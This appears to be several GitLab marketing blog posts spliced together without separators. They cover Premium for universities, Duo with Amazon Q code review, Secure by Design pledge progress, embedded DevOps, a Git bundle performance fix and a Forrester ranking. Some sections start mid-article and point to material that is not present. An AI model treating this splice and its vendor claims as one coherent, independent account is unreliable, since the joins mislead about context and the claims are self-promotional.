In Australia, Deakin University’s enablement team uses GitLab to build standardized processes and reusable templates — such as custom merge request templates, templated build pipelines, and a security and compliance framework — that can be shared with the broader university community and citizen developers, driving innovation and collaboration both inside the university and with key partners. “We were trying to bring in a community of practice and help it thrive for quite some time, but we were never successful until we had this tool,” said Aaron Whitehand, director of Digital Enablement at Deakin University.

Read more about how Deakin University uses GitLab to drive improvements in collaboration and productivity, including a 60% reduction in manual tasks.

Advanced data protection and governance

Educational institutions generate and manage vast amounts of data, ranging from student records and financial information to research findings and faculty evaluations. The security stakes are particularly high. The 2023 MOVEit breach, which spanned three months and compromised approximately 900 educational institutions, exposed the sensitive information of more than 62 million people. This demonstrates the critical need for proactive security measures integrated directly into higher education development workflows.

Vulnerability scanning stops code releases that contain security risks, enabling institutions to establish and enforce governance protocols that protect sensitive information. These capabilities help universities implement proper access controls and permission structures for research databases, creating a secure framework where authorized researchers maintain appropriate access – effectively balancing robust protection with necessary collaboration.

GitLab is built from the ground up to secure your source code. Scalable Git-based repositories, granular access controls, and built-in compliance features eliminate bottlenecks in your workflow while meeting security requirements. GitLab Premium provides audit tracking and compliance capabilities essential for educational environments. Complete audit trails capture detailed logs of all code changes, access attempts, and system modifications with timestamps and user attribution. Full change management documentation ensures traceability of who made what changes, when, and why – critical for research integrity – while access control auditing monitors repository access and permissions changes.

Cloud-based development environments and remote collaboration

Modern educational institutions require flexible development environments that support distributed teams, remote learning scenarios, and diverse technical requirements. GitLab Premium provides:

• GitLab Workspaces: Cloud-based development environments accessible from any device
• Web IDE integration: Browser-based coding with full GitLab feature integration
• Container-based development: Consistent, reproducible development environments across different projects and user groups

These capabilities are particularly valuable for supporting remote and hybrid learning models, enabling students and researchers to access standardized development environments regardless of their physical location or local hardware constraints.

Professional support for critical systems

Small IT teams in educational settings often support large, complex infrastructure with minimal resources. Reaching out to user forums for answers doesn't always mean you'll get an accurate reply and isn't efficient for large teams. GitLab Premium includes dedicated professional support, providing faster issue resolution and upgrade assistance during critical periods like class enrollment or research deadlines.

This minimizes downtime for critical services and ensures continuity of operations during peak usage periods, giving stretched IT departments the enterprise-grade reliability they need for essential academic systems.

Built on open source with enterprise capabilities

Open source software is developed collaboratively in a public manner, with source code freely available for anyone to view, modify, and distribute. This development model fosters innovation through community contributions and ensures transparency in how software functions. GitLab's open source foundation resonates strongly with educational institutions' values around collaboration, transparency, and community contribution. GitLab Premium features extend this foundation with enterprise-grade capabilities while maintaining the ability to contribute back to the open source ecosystem.

Key open source advantages include:

• Transparency: Complete visibility into platform capabilities and security measures – you can examine exactly how the software works
• Community contribution: Ability to contribute improvements back to the broader community and benefit from global developer expertise
• Vendor independence: Reduced lock-in risk with open source alternatives and the freedom to modify code as needed
• Co-creation opportunities: Collaborative development with the broader community, including other educational institutions, to build shared solutions

AI assistant for software development tasks

GitLab Premium with Duo brings powerful AI-native capabilities directly into the development workflow, including:

• Code Suggestions, which provides real-time code completion and suggestions, helping developers write code faster and more efficiently
• Chat, which allows team members to get instant answers to questions, troubleshoot issues, and access documentation directly within the GitLab environment

These AI tools significantly enhance productivity, reduce errors, and streamline collaboration, making GitLab Premium an even more valuable asset for software development teams in higher education.

Transparency at the core

Higher education institutions handle incredibly sensitive data — from student records and research findings to proprietary academic work and federal grant information.

The GitLab AI Transparency Center demonstrates our commitment to transparency, accountability, and protection of customer data and intellectual property, providing the privacy guarantees that educational institutions require.

GitLab launched the AI Transparency Center to help customers, community, and team members better understand how GitLab upholds ethics and transparency in our AI-powered features.

Our publicly available documentation highlights the comprehensive measures we take to protect your institution's data and intellectual property. GitLab's AI Ethics Principles for Product Development guide us as we continue to build and evolve our AI functionality, helping higher education organizations harness the promise of AI while maintaining complete control and oversight of their most valuable information assets.

Get started with GitLab Premium today

For educational institutions, GitLab Premium with Duo represents a strategic technical investment that combines the benefits of open source development with enterprise-grade, AI-native capabilities. By providing professional-grade tools ready for the challenges familiar to the complex technical environment of higher education, GitLab Premium with Duo helps institutions address security vulnerabilities, streamline development workflows, and maintain the reliable infrastructure that academic and research operations depend on.

Learn more about GitLab for Public Sector or speak to our sales team today.

Read more

• Unlocking AI for every GitLab Premium and Ultimate customer
• GitLab Duo Code Suggestions
• GitLab Duo Chat

What if you could have an AI assistant that understands code review feedback and automatically implements the changes for you? That's exactly what GitLab Duo with Amazon Q brings to your development workflow. This seamless integration combines GitLab's comprehensive DevSecOps platform with Amazon Q's advanced AI capabilities, creating an intelligent assistant that can read reviewer comments and converts them directly into code changes. Instead of manually addressing each piece of feedback, you can let AI handle the implementation while you focus on the bigger picture.

How GitLab Duo with Amazon Q works

When you're viewing a merge request with reviewer comments, you'll see feedback scattered throughout your code. Let's take the examples from earlier in this article: maybe you've received a request to update a form label here, a suggestion to display fields side-by-side there, or a note about making certain text bold. Each comment represents a task that normally you'd need to handle manually.

With GitLab Duo with Amazon Q, you can simply enter the /q dev quick action in a comment. This prompts Amazon Q to analyze all the feedback and start modifying your code automatically. The AI agent understands the context of each comment and implements the requested changes directly in your codebase.

Once Amazon Q processes the feedback, you can view all the updates in the "Changes" tab of your merge request. Every modification is clearly visible, so you can verify that the AI agent correctly interpreted and implemented each piece of feedback. You can then run your updated application to confirm that all the changes work as expected — that form label is updated, the fields are displayed side-by-side, the text is bold, and yes, that button is now blue.

Watch the code review feedback process in action:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/31E9X9BrK5s?si=ThFywR34V3Bfj1Z-" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Processing code review feedback is a necessary but time-intensive part of software development. GitLab Duo with Amazon Q evolves this manual process into an automated workflow, dramatically reducing the time between receiving feedback and implementing changes. By letting AI handle these routine modifications, you're free to focus on what really matters — building innovative features and solving complex problems.

With GitLab Duo with Amazon Q, you can:

• Eliminate hours of manual feedback implementation
• Accelerate your code review cycles
• Maintain consistency in how feedback is addressed
• Reduce context switching between reviewing comments and writing code
• Ship features faster with streamlined deployment times

To learn more about GitLab Duo with Amazon Q visit us at an upcoming AWS Summit in a city near you or reach out to your GitLab representative.

GitLab Duo with Amazon Q resources

• GitLab Duo with Amazon Q: Agentic AI optimized for AWS generally available
• GitLab and AWS partner page
• GitLab Duo with Amazon Q documentation
• What is agentic AI?
• Agentic AI guides and resources

Meeting the security goals

Let’s explore the additions and improvements we've made to further enhance security across the development lifecycle.

Multi-factor authentication (MFA)

Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the use of multi-factor authentication across the manufacturer’s products.

GitLab currently offers multiple MFA options for users to secure their accounts. We also offer SSO functionality to enable GitLab.com, Self-Managed, and GitLab Dedicated customers to streamline their authentication processes and their internal MFA requirements.

To further enhance the platform’s resilience, and to create a more secure foundation for our customers, GitLab is executing a phased MFA by Default rollout.

In the coming months, we will deploy changes requiring all customers to enable MFA on their accounts.

For customers who already have MFA enabled or authenticate to GitLab via their organization’s single sign-on (SSO) method, there will be no necessary changes. For customers who do not already have MFA enabled and are not authenticating to GitLab via their organization’s SSO method, they will be required to enable MFA and enroll in one or more of the available MFA methods.

The MFA rollout will occur in stages to ensure a smooth and consistent adoption across all customers. More details on GitLab’s MFA by Default rollout will be shared in the near future.

Default passwords

Goal: Within one year of signing the pledge, demonstrate measurable progress towards reducing default passwords across the manufacturers’ products.

To reduce the use of default passwords, GitLab uses randomly generated root passwords for its multiple installation methods. GitLab’s multi-method installation instructions also include guidance on how to change the randomly generated root password for each installation.

For some install methods, such as installing GitLab in a Docker container, the password file with the initial root password is deleted in the first container restart after 24 hours to help further harden the GitLab instance.

Reducing entire classes of vulnerabilities

Goal: Within one year of signing the pledge, demonstrate actions taken towards enabling a significant measurable reduction in the prevalence of one or more vulnerability classes across the manufacturer’s products.

GitLab has published secure coding guidelines to its documentation site that contains descriptions and guidelines for addressing security vulnerabilities commonly identified in the GitLab codebase.

The guidelines are “intended to help developers identify potential security vulnerabilities early, with the goal of reducing the number of vulnerabilities released over time.”

GitLab continues to improve its SAST rule coverage to address broader sets of security vulnerabilities for itself and its customers.

Security patches

Goal: Within one year of signing the pledge, demonstrate actions taken to measurably increase the installation of security patches by customers.

GitLab handles all updates related to its GitLab.com and GitLab Dedicated service offerings. Additionally, GitLab publishes a maintenance policy, which outlines its approach to releasing updates, backporting, upgrade recommendations and supporting documentation, etc.

GitLab’s documentation has comprehensive guidance on how to upgrade self-managed instances based on their deployment model. This includes Omnibus, Helm chart, Docker and self-compiled GitLab installations.

GitLab also provides a detailed upgrade plan to ensure proper testing and troubleshooting can be performed as well as rollback plans if necessary.

Depending on the version upgrade, specific changes (example for GitLab 17) for each version are highlighted to ensure a smooth upgrade process and limit unavailability of services.

Vulnerability disclosure policy

Goal: Within one year of signing the pledge, publish a vulnerability disclosure policy (VDP).

GitLab maintains a strong bug bounty program through HackerOne, a security.txt file highlighting GitLab’s preferred and additional disclosure processes, and release posts highlighting security fixes.

Customers and the general public can subscribe to receive GitLab’s release posts directly in their email inbox.

Common vulnerability enumerations

Goal: Within one year of signing the pledge, demonstrate transparency in vulnerability reporting

GitLab includes the Common Weakness Enumeration (CWE) field in all Common vulnerability enumerations (CVE) records it publishes. Over the past year, GitLab has iterated to also include the Common Platform Enumeration (CPE) field in CVE records.

The GitLab CVE assignments project stores a copy of all CVE identifiers assigned and published by GitLab in its role as a CVE Numbering Authority.

Check out GitLab’s CVE submission template.

Evidence of intrusions

Goal: Within one year of signing the pledge, demonstrate a measurable increase in the ability for customers to gather evidence of cybersecurity intrusions affecting the manufacturer’s products.

GitLab has published an incident response guide to help customers respond to incidents involving GitLab instances. Additionally, GitLab has open sourced versions of its GUARD detection-as-code and TLDR threat detection frameworks. The repositories for those open source frameworks can be found on GitLab’s Open Source Security Center.

In a similar manner, GitLab is adding functionality to its GitLab.com service offering to detect compromised passwords for all logins using GitLab’s native username and password authentication method.

What's next

GitLab’s Security Division’s mission is to enable everyone to innovate and succeed on a safe, secure, and trusted DevSecOps platform.

GitLab's security enhancements over the past year have allowed us to demonstrate our commitment to CISA’s Secure by Design Pledge, and they have strengthened our platform and given customers a more reliable and secure foundation to build on.

Our commitment to iteration means we're already focused on the next set of innovations that will drive us forward.

To learn more about GitLab’s security enhancements, bookmark our security page on the GitLab Blog.

Read more

• Secure by Design principles meet DevSecOps innovation in GitLab 17
• Happy birthday, Secure by Design!
• Strengthen your cybersecurity strategy with Secure by Design

Traditional embedded development approaches cannot effectively handle the software challenges of modern machines. This shortcoming slows engineers down, in part, by exacerbating challenges such as:

• Hardware testing bottlenecks
• Inconsistent build environments
• Siloed development practices
• Manual functional safety compliance processes

Embedded developers need a new approach to deal with the rapid increase in code. In this article, we’ll explain four ways you can use the GitLab AI-native DevSecOps platform to shorten feedback loops, work collaboratively and iteratively, and streamline compliance.

Challenge 1: Hardware testing bottlenecks

Unlike enterprise software that can run on virtually any cloud server, embedded automotive software must be tested on specialized hardware that precisely matches production environments. Traditional hardware-in-the-loop (HIL) testing processes often follow this pattern:

1. Developers write code for an embedded system (e.g., an electronic control unit)
2. They request access to limited, expensive hardware test benches (costing $500,000-$10M each)
3. They wait days or weeks for their scheduled access window
4. They manually deploy and test their code on physical hardware at their desks
5. They document results, pass the hardware to the next developer, and go to the back of the hardware testing queue

This process is extremely inefficient. Embedded developers may finish writing their code today and wait weeks to test it on a hardware target. By then, they've moved on to other tasks. This context switching drains productivity. Not only that, developers may wait weeks to learn they had a simple math error in their code.

Solution: Automated hardware allocation and continuous integration

You can streamline hardware testing through automation using the GitLab On-Premises Device Cloud, a CI/CD component. This lets you automate the orchestration of scarce hardware resources, turning a manual, time-intensive process into a streamlined, continuous workflow.

The On-Premises Device Cloud:

1. Creates pools of shared hardware resources
2. Automatically — and exclusively — allocates hardware to a developer’s hardware testing pipeline tasks based on availability
3. Deploys and executes tests without manual intervention
4. Collects and reports results through integrated pipelines
5. Automatically deallocates hardware back into the “available” pool

After submitting code, you’ll receive results in hours instead of days, often without ever physically touching the test hardware.

What this video for an introduction to the GitLab On-Premises Device Cloud CI/CD Component to orchestrate the remote allocation of shared hardware for HIL:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/ltr2CIM9Zag?si=NOij3t1YYz4zKajC" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

You can also adopt multi-pronged testing strategies that balance speed and quality. Bring the following embedded test patterns and environments into automated GitLab CI pipelines:

• Software-in-the-loop (SIL): Testing on virtual hardware simulators for quicker initial feedback
• Processor-in-the-loop (PIL): Testing on representative processor hardware for faster feedback at a lower cost
• Hardware-in-the-loop (HIL): Testing on full production-equivalent hardware and test benches for late-stage verification

By automating the orchestration of these tests within CI pipelines, you’ll be able to identify issues earlier, iterate faster, and accelerate time to market.

Challenge 2: Inconsistent build environments

Another significant challenge in embedded development is build environment inconsistency. Embedded developers often manually execute builds on their local machines with varying configurations, compiler versions, and dependencies. Then they’ll paste the binaries from their local build to a shared codebase.

This approach creates several problems:

• Inconsistent outputs: Builds for the same source code produce different results on different machines
• "Works on my machine" syndrome: Code that builds locally fails in shared environments
• Poor traceability: Limited audit trail of who built what and when
• Knowledge silos: Build expertise becomes concentrated in a few individuals

This approach can lead to errors, bottlenecks, and costly delays.

Solution: Standardized build automation

You can address these challenges by implementing standardized build automation within CI/CD pipelines in GitLab. This approach creates consistent, repeatable, container-based build environments that eliminate machine-specific variations. Through the use of special Embedded Gateway Runner provisioning scripts, containers can interface with hardware for flashing and port monitoring for automated testing.

Key elements of this solution include:

• Lifecycle managed environments: Define complex embedded simulation environments as code; automatically deploy environments for testing and destroy them afterward
• Containerization: Use Docker containers to ensure identical build environments
• Automated dependency management: Control and version all dependencies
• Central build execution: Run builds on shared infrastructure rather than local machines

Follow this tutorial to learn how to automate embedded software builds within a GitLab CI pipeline.

By standardizing and automating the build process, you can ensure that every build follows the same steps with the same dependencies, producing consistent outputs regardless of who initiated it. This not only improves quality but also democratizes the build process, enabling more team members to participate without specialized knowledge.

Challenge 3: Siloed development practices

Enterprise development teams have widely adopted collaborative practices such as DevOps, underpinned by shared source code management (SCM) and continuous integration/continuous delivery (CI/CD) systems. Embedded developers, on the other hand, have historically worked alone at their desks. There are valid technical reasons for this.

For example, consider hardware virtualization, which is a key enabler of DevOps automation. The industry has been slower to virtualize the massive range of specialized processors and boards used in embedded systems. This is due in large part to the difficulties of virtualizing production real-time systems and the associated lack of economic incentives. Compare that to cloud virtualization which has been commoditized and benefited enterprise SaaS development for over a decade.

Many providers are now embracing virtualization-first for the sake of speeding up embedded development. If teams fail to adopt virtual testing options, however, their silos will remain and negatively impact the business through:

• Knowledge fragmentation: Critical insights remain scattered across individuals and teams
• Redundant development: Multiple teams solve identical problems, creating inconsistencies
• Late-stage discovery during big-bang integrations: Problems are found late in the process when multiple developers integrate their code at once, when errors are more costly to fix
• Stifled innovation: Solutions from one domain rarely influence others, hampering the development of new product ideas

Solution: Collaborative engineering through a unified platform

An important step in breaking down these silos is to standardize embedded development around GitLab’s unified DevSecOps platform. In this regard, GitLab is aligned with the shift of embedded systems toward more consolidated, shared platforms on embedded devices. GitLab enables:

• Shared visibility: Make all code, Issues, and documentation visible across teams
• Collaborative workflows: Enable peer review and knowledge sharing through merge requests
• Centralized knowledge: Maintain a single source of truth for all development artifacts
• Asynchronous collaboration: Allow teams to work together across different locations and time zones

Human-AI agent collaboration is a fundamental ingredient to fueling the customer-facing innovations that digital natives and established embedded brands desire. GitLab enables human-AI collaboration as well. By creating transparency across the development lifecycle, GitLab changes embedded development from an isolated activity to a collaborative practice. Engineers can see each other's work in progress, learn from collective experiences, and build upon shared solutions.

Watch this presentation from Embedded World Germany 2025, which explains the power of embedded developers collaborating and sharing “work in progress”. The demo portion from 24:42 to 36:51 shows how to integrate HIL into a GitLab CI pipeline and enable collaborative development.

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/F_rlOyq0hzc?si=eF4alDY6HK98uZPj" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

Perhaps most importantly, by achieving greater collaboration through DevSecOps, teams can unlock embedded systems innovations that would otherwise remain hidden. Indeed, collaboration fuels innovation. One study, for example, found that group brainstorming, when properly structured, can lead to more innovative and creative outcomes than individuals working alone. Collaborative development is crucial in the race to develop software-defined products.

Challenge 4: Manual functional safety compliance processes

Embedded systems in the automotive and aerospace industries must comply with rigorous functional safety standards, including ISO 26262, MISRA C/C++, DO-178C, and DO-254. Traditional compliance approaches involve manual reviews, extensive documentation, and separate verification activities that occur late in the development cycle. This often creates security review bottlenecks. When specialized embedded security and code quality scanners detect vulnerabilities in a developer’s code, the scan issue gets added to a pile of other issues that haven’t been resolved. Developers can’t integrate their code, and security personnel need to wade through a backlog of code violations. This creates delays and makes compliance more difficult.

Some of the challenges can best be summed up as:

• Late-stage compliance issues: Problems discovered after development is complete
• Documentation burden: Extensive manual effort to create and maintain compliance evidence
• Process bottlenecks: Serial compliance activities that block development progress
• Expertise dependence: Reliance on limited specialists for compliance activities

As a result, teams often need to choose between velocity and compliance — a precarious trade-off in safety-critical systems.

Solution: Automated functional safety compliance workflow building blocks

Rather than treating security and compliance as post-development verification activities, you can codify compliance requirements and enforce them automatically through customizable frameworks in GitLab. To do this for functional safety standards, in particular, you can integrate GitLab with specialized embedded tools, which provide the depth of firmware scanning required by functional safety standards. Meanwhile, GitLab provides automated compliance checks, full audit trails, and merge request gating — all features needed to support a robust continuous compliance program.

This integrated approach includes:

• Compliance-as-code: Define compliance requirements as automated checks
• Integrated specialized tools: Connect tools like CodeSonar into the DevSecOps platform for automotive-specific compliance
• Continuous compliance verification: Verify requirements throughout development
• Automated evidence collection: Gather compliance artifacts as a by-product of development

Watch this video to learn how to use Custom Compliance Frameworks in GitLab to create your own compliance policies. You can create compliance policies related to any standard (e.g., ISO 26262) and automatically enforce those policies in GitLab.

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/S-FQjzSyVJw?si=0UdtGNuugLPG0SLL" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

By shifting compliance left and embedding it within normal development workflows, you can maintain safety standards without sacrificing velocity. Automated checks catch issues early when they're easier and less expensive to fix, while continuous evidence collection reduces the documentation burden.

Realizing the power of embedded DevOps

Embedded development is changing fast. Teams that remain stuck in manual processes and isolated workflows will find themselves increasingly left behind, while those that embrace automated, collaborative practices will define the future of software-defined smart systems.

Explore our Embedded DevOps Workshop to start automating embedded development workflows with GitLab, or watch this presentation from GitLab's Field Chief Cloud Architect to learn how leading organizations are bringing hardware-in-the-loop testing into continuous integration workflows to accelerate embedded development.

Learn more

• Why GitLab Premium with Duo for embedded systems development?
• Why GitLab Ultimate with Duo for embedded systems development?
• More embedded development systems presentations from GitLab

Ultimately, we traced the issue to a 15-year-old Git function with O(N²) complexity and fixed it with an algorithmic change, reducing backup times exponentially. The result: lower costs, reduced risk, and backup strategies that actually scale with your codebase.

This turned out to be a Git scalability issue that affects anyone with large repositories. Here's how we tracked it down and fixed it.

Backup at scale

First, let's look at the problem. As organizations scale their repositories and backups grow more complex, here are some of the challenges they can face:

• Time-prohibitive backups: For very large repositories, creating a repository backup could take several hours, which can hinder the ability to schedule regular backups.
• Resource intensity: Extended backup processes can consume substantial server resources, potentially impacting other operations.
• Backup windows: Finding adequate maintenance windows for such lengthy processes can be difficult for teams running 24/7 operations.
• Increased failure risk: Long-running processes are more susceptible to interruptions from network issues, server restarts, and system errors, which can force teams to restart the entire very long backup process from scratch.
• Race conditions: Because it takes a long time to create a backup, the repository might have changed a lot during the process, potentially creating an invalid backup or interrupting the backup because objects are no longer available.

These challenges can lead to compromising on backup frequency or completeness – an unacceptable trade-off when it comes to data protection. Extended backup windows can force customers into workarounds. Some might adopt external tooling, while others might reduce backup frequency, resulting in potential inconsistent data protection strategies across organizations.

Now, let's dig into how we identified a performance bottleneck, found a resolution, and deployed it to help cut backup times.

The technical challenge

GitLab's repository backup functionality relies on the git bundle create command, which captures a complete snapshot of a repository, including all objects and references like branches and tags. This bundle serves as a restoration point for recreating the repository in its exact state.

However, the implementation of the command suffered from poor scalability related to reference count, creating a performance bottleneck. As repositories accumulated more references, processing time increased exponentially. In our largest repositories containing millions of references, backup operations could extend beyond 48 hours.

Root cause analysis

To identify the root cause of this performance bottleneck, we analyzed a flame graph of the command during execution.

A flame graph displays the execution path of a command through its stack trace. Each bar corresponds to a function in the code, with the bar's width indicating how much time the command spent executing within that particular function.

When examining the flame graph of git bundle create running on a repository with 10,000 references, approximately 80% of the execution time is consumed by the object_array_remove_duplicates() function. This function was introduced to Git in the commit b2a6d1c686 (bundle: allow the same ref to be given more than once, 2009-01-17).

To understand this change, it's important to know that git bundle create allows users to specify which references to include in the bundle. For complete repository bundles, the --all flag packages all references.

The commit addressed a problem where users providing duplicate references through the command line – such as git bundle create main.bundle main main - would create a bundle without properly handling the duplicated main reference. Unbundling this bundle in a Git repository would break, because it tries to write the same ref twice. The code to avoid duplication uses nested for loops that iterate through all references to identify duplicates. This O(N²) algorithm becomes a significant performance bottleneck in repositories with large reference counts, consuming substantial processing time.

The fix: From O(N²) to efficient mapping

To resolve this performance issue, we contributed an upstream fix to Git that replaces the nested loops with a map data structure. Each reference is added to the map, which automatically ensures only a single copy of each reference is retained for processing.

This change dramatically enhances the performance of git bundle create and enables much better scalability in repositories with large reference counts. Benchmark testing on a repository with 10,000 references demonstrates a 6x performance improvement.

Benchmark 1: bundle (refcount = 100000, revision = master)
  Time (mean ± σ): 	14.653 s ±  0.203 s	[User: 13.940 s, System: 0.762 s]
  Range (min … max):   14.237 s … 14.920 s	10 runs

Benchmark 2: bundle (refcount = 100000, revision = HEAD)
  Time (mean ± σ):  	2.394 s ±  0.023 s	[User: 1.684 s, System: 0.798 s]
  Range (min … max):	2.364 s …  2.425 s	10 runs

Summary
  bundle (refcount = 100000, revision = HEAD) ran
	6.12 ± 0.10 times faster than bundle (refcount = 100000, revision = master)

The patch was accepted and merged into upstream Git. At GitLab, we backported this fix to ensure our customers could benefit immediately, without waiting for the next Git release.

The result: Dramatically decreased backup times

The performance gains from this improvement have been nothing short of transformative:

• From 48 hours to 41 minutes: Creating a backup of our largest repository (gitlab-org/gitlab) now takes just 1.4% of the original time.
• Consistent performance: The improvement scales reliably across repository sizes.
• Resource efficiency: We significantly reduced server load during backup operations.
• Broader applicability: While backup creation sees the most dramatic improvement, all bundle-based operations that operate on many references benefit.

What this means for GitLab customers

For GitLab customers, this enhancement delivers immediate and tangible benefits on how organizations approach repository backup and disaster recovery planning:

• Transformed backup strategies
  • Enterprise teams can establish comprehensive nightly schedules without impacting development workflows or requiring extensive backup windows.
  • Backups can now run seamlessly in the background during nightly schedules, instead of needing to be dedicated and lengthy.
• Enhanced business continuity
  • With backup times reduced from days to minutes, organizations significantly minimize their recovery point objectives (RPO). This translates to reduced business risk – in a disaster scenario, you're potentially recovering hours of work instead of days.
• Reduced operational overhead
  • Less server resource consumption and shorter maintenance windows.
  • Shorter backup windows mean reduced compute costs, especially in cloud environments, where extended processing time translates directly to higher bills.
• Future-proofed infrastructure
  • Growing repositories no longer force difficult choices between backup frequency and system performance.
  • As your codebase expands, your backup strategy can scale seamlessly alongside it

Organizations can now implement more robust backup strategies without compromising on performance or completeness. What was once a challenging trade-off has become a straightforward operational practice.

Starting with the GitLab 18.0 release, all GitLab customers regardless of their license tier can already fully take advantage of these improvements for their backup strategy and execution. There is no further change in configuration required.

What's next

This breakthrough is part of our ongoing commitment to scalable, enterprise-grade Git infrastructure. While the improvement of 48 hours to 41 minutes for backup creation time represents a significant milestone, we continue to identify and address performance bottlenecks throughout our stack.

We're particularly proud that this enhancement was contributed upstream to the Git project, benefiting not just GitLab users but the broader Git community. This collaborative approach to development ensures that improvements are thoroughly reviewed, widely tested, and available to all.

Deep infrastructure work like this is how we approach performance at GitLab. Join the GitLab 18 virtual launch event to see what other fundamental improvements we're shipping. Register today!

Here's where GitLab Duo with Amazon Q, our new offering that delivers agentic AI throughout the software development lifecycle for AWS customers, comes in to transform your review process. This intelligent, AI-powered solution can perform comprehensive code reviews for you in a fraction of the time it would take your human colleagues. By leveraging advanced agentic AI capabilities, GitLab Duo with Amazon Q streamlines your entire review workflow without sacrificing the quality and thoroughness you need. Think of it as having an always-available, highly skilled reviewer who can instantly analyze your code and provide actionable feedback.

How it works: Launching a code review

So how does GitLab Duo with Amazon Q actually work? Let's say you've just finished working on a feature and created a merge request with multiple code updates. Instead of pinging your teammates and waiting for their availability, you simply enter a quick command in the comment section: "/q review". That's it – just those two words trigger the AI to spring into action.

Once you've entered the command, Amazon Q Service immediately begins analyzing your code changes. You'll see a confirmation that the review is underway, and within moments, the AI is examining every line of your updates, checking for potential issues across multiple dimensions. When the review completes, you receive comprehensive feedback that covers all the bases: bug detection, readability improvements, syntax errors, and adherence to your team's coding standards. The AI doesn't just point out problems, it provides context and suggestions for fixing them, making it easy for you to understand what needs attention and why.

The beauty of this agentic AI approach is that it handles the heavy lifting of code review while you focus on what matters most: building great software. You get the benefits of thorough code reviews — better bug detection, consistent coding standards, and improved code quality — without the time sink. Your deployment times shrink dramatically because you're no longer waiting in review queues, and your entire team becomes more productive.

Why use GitLab Duo with Amazon Q?

GitLab Duo with Amazon Q transforms your development workflow in the following ways:

• Lightning-fast code reviews that don't compromise on quality
• Consistent application of coding standards across your entire codebase
• Immediate feedback that helps you fix issues before they reach production
• Reduced deployment times that let you ship features faster
• More time for your team to focus on creative problem-solving instead of repetitive reviews

Ready to see this game-changing feature in action? Watch how GitLab Duo with Amazon Q can revolutionize your code review process:

<!-- blank line --> <figure class="video_container"> <iframe src="https://www.youtube.com/embed/4gFIgyFc02Q?si=GXVz--AIrWiwzf-I" frameborder="0" allowfullscreen="true"> </iframe> </figure> <!-- blank line -->

To learn more about GitLab Duo with Amazon Q visit us at an upcoming AWS Summit in a city near you or reach out to your GitLab representative.

And make sure to join the GitLab 18 virtual launch event to learn about our agentic AI plans and more. Register today!

"GitLab is the most all-in-one of the all-in-one solutions and suits enterprises looking to standardize with a single purchase.” - Forrester Wave™: DevOps Platforms, Q2 2025

For us, this recognition reflects what we've been hearing from customers: They need to deliver secure software faster, but existing solutions force them to compromise on speed, security, or simplicity. GitLab delivers all three. And with our GitLab 18.0 release in May, we’ve taken this a step further by including AI-native GitLab Duo capabilities — such as test generation, code suggestions, and code refactoring — directly in GitLab Premium and GitLab Ultimate at no additional cost.

Access the report today!

Staying at the forefront of AI transformation, with enterprise control

DevSecOps is rapidly evolving, with AI at the forefront of that change. Unfortunately, many AI tools force a choice: cutting-edge capabilities or enterprise security.

Forrester scored GitLab a 5 – the highest on their scale – for both the AI infusion and AI risk mitigation criteria. We’re pleased to see our focus on building innovative AI capabilities that maintain security is being noticed by more than just our customers.

This dual strength shows up across our GitLab Duo AI offerings, including:

• Duo Workflow (private beta): Autonomous AI agents that handle complex tasks across development, security, and operations — with enterprise-grade guardrails and audit trails.
• Agentic Chat: Contextual, conversational AI assistance for everything from code explanations to test creation — with IP protection and privacy controls built in.
• Code Suggestions: AI assistance that can predictively complete code blocks, define function logic, generate tests, and propose common code like regex patterns.
• AI-native Vulnerability Resolution: Find and fix vulnerabilities with auto explanation and auto-generated merge requests, ensuring a streamlined development process.

Doing more with less

We’ve heard loud and clear that DevSecOps teams don’t need more tools and integrations that help them with part of their software delivery lifecycle. They need a seamless, integrated developer experience that covers the entire SDLC.

We believe GitLab’s scores in the following criteria are validation of our customer-focused strategy:

• Day zero experience: Forrester cited our “strong day zero experience,” noting that “everything is ready to run out-of-the-box,” supported by extensive migration tools and tutorials.
• Developer tooling: Forrester pointed to GitLab Duo with Amazon Q, our agentic AI offering for AWS customers, as well as our cloud development environment, integrated developer platform, and wikis for documentation as examples.
• Project planning and alignment: Forrester noted our "strong compliance center," and that we have tools to drive alignment top-down and bottom-up.
• Pipeline security: Forrester gave us the highest score possible in the pipeline security criterion.
• Build automation and CI: Forrester cited our build automation and CI with multistage build pipelines and strong self-hosted support.

Read the report

For us, being named a Leader in The Forrester Wave™: DevOps Platforms, Q2 2025 speaks to the breadth and depth of our platform’s capabilities, providing a single source of truth for the entire software development lifecycle. No more juggling multiple tools and integrations – GitLab provides a seamless, integrated experience that boosts productivity and reduces friction. We believe this placement reflects the hard work of our team, the many contributions from GitLab’s open source community, the invaluable feedback from our customers, and our dedication to shaping the future of software development.

Access the report today!

Forrester does not endorse any company, product, brand, or service included in its research publications and does not advise any person to select the products or services of any company or brand based on the ratings included in such publications. Information is based on the best available resources. Opinions reflect judgment at the time and are subject to change. For more information, read about Forrester’s objectivity here.